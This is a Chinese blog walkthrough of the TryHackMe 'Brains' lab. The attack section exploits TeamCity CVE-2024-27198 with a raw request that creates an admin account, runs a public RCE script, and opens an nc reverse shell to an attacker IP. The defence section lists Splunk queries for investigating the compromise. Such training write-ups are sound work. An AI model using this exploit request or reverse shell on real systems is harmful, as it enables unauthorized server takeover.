TryhackMe Brains

TryhackMe Brains靶场:


image-20250331090405029

房间介绍

欢迎来到 Brains 挑战赛,这是 TryHackMe 黑客马拉松的一部分!

所有大脑聚集在一起,打造一个工程奇迹;然而,似乎有陌生人找到了进入。

首先部署计算机;单击 此任务右上角的 按钮,为该房间部署虚拟机。Start Machine

注意:请等待机器 4 - 6 分钟以完全启动。

红队:利用服务器!

信息收集

端口扫描发现存在22,80,50000端口

image-20250331090601914

查看80端口网页发现,网站维护,目录扫描啥也没扫到

image-20250331101627685

查看一下50000端口发现是Teamcity版本是2023.11.3的版本

image-20250331102506941.png

JetBrains TeamCity 身份验证绕过漏洞 CVE-2024-27198

通过查找找到历史漏洞JetBrains TeamCity 身份验证绕过漏洞 CVE-2024-27198

image-20250331102543586

这边我们选择使用BurpSuite手动发包

image-20250331103337164

POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: your-ip:8111
x-teamcity-client: Web UI
x-requested-with: XMLHttpRequest
Referer: http://your-ip:8111/profile.html
x-tc-csrf-token: a1f58037-7d9e-4934-9243-089e213c15e2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Content-Type: application/json
Content-Length: 161

{
  "username": "user1",
  "password": "user1",
  "email": "userthr331@npc.com",
  "roles": { "role": [{ "roleId": "SYSTEM_ADMIN", "scope": "g" }] }
}

使用我们创建的用户登录user1:user1

image-20250331103627220

但是我发现我不知道怎么RCE,去网上找找RCE的,有没有RCE的案例,
这是我找到的RCE的脚本,如果你和小T一样使用tryhackme的攻击机请使用python3

pip3 install requests urllib3 faker
/usr/bin/python3 -m pip install --upgrade pip
python3 CVE-2024-27198-RCE.py -t http://10.10.101.109:50000

W01fh4cker/CVE-2024-27198-RCE: CVE-2024-27198 & CVE-2024-27199身份验证绕过 --> JetBrains TeamCity中2023.11.4之前的RCE

拿到shell之后可以发现shell不稳定,反弹一个shell
提前使用nc监听

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.172.133 6677 >/tmp/f

image-20250331144918713

使用python3稳定shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

image-20250331145024065

获取flag.txt

到用户目录拿flag.txt
最后的图片就不放了因为小T又崩了

cd /
cd home
cd ubuntu
cat flag.txt

image-20250331145307061

蓝队:让我们调查

房间介绍

现在是检测部分。

IT 部门为我们提供了其中一台服务器,该服务器因攻击而受损。作为取证分析师,我们的任务是检查主机并识别攻击者在漏洞利用后阶段的足迹。

实验室连接

在继续之前,请部署计算机。部署计算机时,将为其分配一个 IP 地址:。Splunk 实例将在大约 5 分钟内访问,并且可以使用以下凭据进行访问:10.10.89.139``10.10.89.139:8000

用户名:splunk

密码:analyst12

image-20250331151409609

被利用后在服务器上创建的后门用户名称是什么?

source=“/var/log/auth.log” useradd

image-20250331153920587

服务器上安装的具有恶意的软件包的名称是什么?

source=“/var/log/dpkg.log” date_month=“july” date_mday=“4” install

image-20250331153407912

成功利用后,服务器上安装的插件名称是什么?

source=“/opt/teamcity/TeamCity/logs/teamcity-activities.log” plugin

image-20250331152716575

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

TiAmo_睡不醒

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值